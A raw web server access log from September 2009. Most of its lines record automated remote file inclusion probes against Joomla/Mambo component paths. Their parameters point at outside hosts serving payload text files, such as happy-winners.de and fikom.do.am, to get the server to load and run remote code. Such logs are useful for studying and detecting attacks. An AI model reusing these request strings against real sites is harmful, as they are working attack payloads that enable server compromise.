222.236.47.23 - - [08/Sep/2009:02:11:56 -0500] "GET /logs/access_log.1241913600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1242086400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1243382400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1243555200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1244073600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1246579200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1247443200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1243123200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1243814400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1247875200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1245196800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:03 -0500] "GET /logs/access_log.1242518400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:07 -0500] "GET /logs/access_log.1242691200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:07 -0500] "GET /logs/access_log.1244937600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:07 -0500] "GET /logs/access_log.1243209600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:07 -0500] "GET /logs/access_log.1244505600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:07 -0500] "GET /logs/access_log.1248048000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:13 -0500] "GET /logs/access_log.1243296000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:13 -0500] "GET /logs/access_log.1243900800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:13 -0500] "GET /logs/access_log.1242086400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1244073600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1243555200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1243382400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1243814400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1246579200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1247443200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1247875200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:14 -0500] "GET /logs/access_log.1243123200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:23 -0500] "GET /logs/access_log.1245196800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:23 -0500] "GET /logs/access_log.1243209600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:12:23 -0500] "GET /logs/access_log.1242518400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:34 -0500] "GET /logs/access_log.1244419200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:34 -0500] "GET /logs/access_log.1243641600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:36 -0500] "GET /logs/access_log.1246752000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:12:38 -0500] "GET /logs/access_log.1244678400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:12:51 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:12:51 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:12:51 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:02 -0500] "GET /logs/access_log.1241913600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1243900800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1246579200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1243555200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1242086400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1243382400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1243296000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:03 -0500] "GET /logs/access_log.1244073600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:13:10 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:13:11 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:13:11 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:13:12 -0500] "GET /logs/access_log.1236211200//classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1243123200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1242518400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1243814400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1247443200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1245196800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1247875200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1243209600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:13:26 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:13:51 -0500] "GET /logs/access_log.1230768000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:19:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:19:54 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:19:54 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:19:54 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:02:24:21 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:24:21 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:24:55 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:24:55 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
65.55.106.228 - - [08/Sep/2009:02:25:33 -0500] "GET /logs/access_log.1111190400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.64.216.6 - - [08/Sep/2009:02:28:54 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:28:54 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:28:54 -0500] "GET /logs/access_log.1244160000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:29:36 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:29:36 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:29:36 -0500] "GET /logs/access_log.1244160000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:30:06 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:30:11 -0500] "GET /logs/access_log.1244160000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:30:11 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:31:54 -0500] "GET /logs/access_log.1248048000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:34:46 -0500] "GET /logs/access_log.1248048000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:34:51 -0500] "GET ///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:34:51 -0500] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:34:51 -0500] "GET /logs/access_log.1246752000///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:34:57 -0500] "GET /logs/access_log.1246924800///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:02:34:58 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:34:58 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:35:00 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:35:00 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
193.238.63.50 - - [08/Sep/2009:02:36:30 -0500] "GET /logs//index.php?corpo=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.69"
193.238.63.50 - - [08/Sep/2009:02:36:32 -0500] "GET //index.php?corpo=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.69"
65.55.106.108 - - [08/Sep/2009:02:36:47 -0500] "GET /logs/access_log.1141344000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [08/Sep/2009:02:37:55 -0500] "GET /logs//com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:02:37:55 -0500] "GET //com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.140.23.192 - - [08/Sep/2009:02:43:53 -0500] "GET ///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:43:53 -0500] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:43:53 -0500] "GET /logs/access_log.1246752000///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:02:44:07 -0500] "GET /logs/access_log.1247443200///components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.207.52 - - [08/Sep/2009:02:45:55 -0500] "GET /logs/access_log.1165708800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.180.14 - - [08/Sep/2009:02:53:54 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:53:54 -0500] "GET /logs/access_log.1236211200///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:53:56 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 200 204203 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:54:48 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:54:48 -0500] "GET /logs/access_log.1236211200///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:54:50 -0500] "GET /logs/access_log.1236211200///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:54:50 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:54:57 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 204203 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:02:56:08 -0500] "GET /?view=page&pagename=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:02:56:11 -0500] "GET /logs/access_log.1241395200/?view=page&pagename=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:13 -0500] "GET /logs/access_log.1243036800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:13 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:02:56:13 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
